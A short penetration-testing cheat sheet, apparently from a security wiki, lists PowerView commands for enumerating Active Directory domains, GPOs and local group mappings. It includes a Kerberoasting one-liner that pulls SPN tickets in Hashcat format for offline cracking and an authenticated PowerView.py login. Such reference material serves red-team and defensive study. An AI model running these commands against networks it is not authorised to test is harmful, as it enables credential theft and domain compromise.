PowerView

SharpView is the .NET version of PowerView; it can be useful when PowerShell is restricted.

Enumeration

  • %Foreach alias

  • ?where alias

# Domain information
Get-Domain

# Domain SID
Get-DomainSID

# DC info
Get-DomainController

When forging tickets, the Kerberos-related policies are typically set to the default values by the tools (e.g. mimikatz, rubeus) automatically. If the domain has custom values, the mismatch will probably cause issues.

# Domain policies
Get-DomainPolicyData
# List domain GPOs
Get-DomainGPO | select displayname
Get-DomainGPO -Identity <host>

# GPOs which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

# Users which are in a local group of a host using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity <host>

# Machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity user

Attacks

Kerberoasting

For Kerberoasting see here.

Password Change

For changing the password of an account see here.

LAPS Password

For changing the LAPS password see here.

# Enumerate Kerberoastable accounts
Get-DomainUser * -SPN | select samaccountname
# Kerberoast the enumerated accounts
Get-DomainUser * -SPN -verbose |  Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_spns.csv -NoTypeInformation

Python Version

PowerView.py is an alternative for the original PowerView.ps1 script. Its main goal is to achieve interactive session without having to repeatedly authenticate to LDAP.

powerview <domain>/<user>:'<pass>'@<domain> -k

Last updated

Was this helpful?